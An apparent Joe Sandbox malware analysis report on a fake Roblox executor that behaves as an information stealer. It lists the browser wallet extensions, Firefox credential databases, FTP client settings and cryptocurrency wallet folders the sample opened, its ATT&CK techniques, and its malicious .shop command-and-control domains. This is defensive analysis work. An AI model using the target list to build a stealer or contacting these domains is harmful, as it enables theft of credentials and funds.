                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: Yara matchFile source: 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model2
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets11
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials33
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Solara-Roblox-Executor-v3.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://microsoft.cop0%Avira URL Cloudsafe
                https://fancywaxxers.shop/api/(b100%Avira URL Cloudmalware
                https://fancywaxxers.shop/i100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiPS100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api#100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiO100%Avira URL Cloudmalware
                https://fancywaxxers.shop/C1100%Avira URL Cloudmalware
                https://fancywaxxers.shop/y100%Avira URL Cloudmalware
                https://fancywaxxers.shop/C100%Avira URL Cloudmalware
                https://fancywaxxers.shop/a100%Avira URL Cloudmalware
                https://fancywaxxers.shop/q100%Avira URL Cloudmalware
                https://fancywaxxers.shop/0100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api100%Avira URL Cloudmalware
                https://fancywaxxers.shop/141638100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.96.1
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    rabidcowse.shopfalse
                      high
                      wholersorie.shopfalse
                        high
                        fancywaxxers.shopfalse
                          high
                          cloudewahsj.shopfalse
                            high
                            noisycuttej.shopfalse
                              high
                              nearycrepso.shopfalse
                                high
                                https://fancywaxxers.shop/apifalse
                                  high
                                  framekgirus.shopfalse
                                    high
                                    tirepublicerj.shopfalse
                                      high
                                      abruptyopsn.shopfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabSolara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://fancywaxxers.shop/api#Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://fancywaxxers.shop/iSolara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSolara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop/aSolara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://fancywaxxers.shop/api/(bSolara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fancywaxxers.shop/apiOSolara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://microsoft.copSolara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.rootca1.amazontrust.com0:Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fancywaxxers.shop/C1Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://ac.ecosia.org/autocomplete?q=Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://fancywaxxers.shop/apiPSSolara-Roblox-Executor-v3.exe, 00000006.00000003.2077082218.0000000005817000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077267157.0000000005818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSolara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fancywaxxers.shop/CSolara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://fancywaxxers.shop/ySolara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://fancywaxxers.shop/Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/products/firefoxgro.allSolara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop/141638Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fancywaxxers.shop/0Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://fancywaxxers.shop:443/apiSolara-Roblox-Executor-v3.exe, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2094257173.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000003023000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093436705.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://fancywaxxers.shop/qSolara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.96.1
                                                                                        fancywaxxers.shopUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582867
                                                                                        Start date and time:2024-12-31 17:22:17 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 4m 14s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Solara-Roblox-Executor-v3.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@10/0@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 46
                                                                                        • Number of non-executed functions: 143
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Solara-Roblox-Executor-v3.exe, PID 3136 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Solara-Roblox-Executor-v3.exe
                                                                                        TimeTypeDescription
                                                                                        11:23:07API Interceptor8x Sleep call for process: Solara-Roblox-Executor-v3.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • pelisplus.so/administrator/index.php
                                                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mffnow.info/1a34/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        fancywaxxers.shopSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.112.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        s-part-0017.t-0009.t-msedge.netover.ps1Get hashmaliciousVidarBrowse
                                                                                        • 13.107.246.45
                                                                                        http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        ds1bfe33xg.exeGet hashmaliciousRedLineBrowse
                                                                                        • 13.107.246.45
                                                                                        u233hvgTow.exeGet hashmaliciousRedLineBrowse
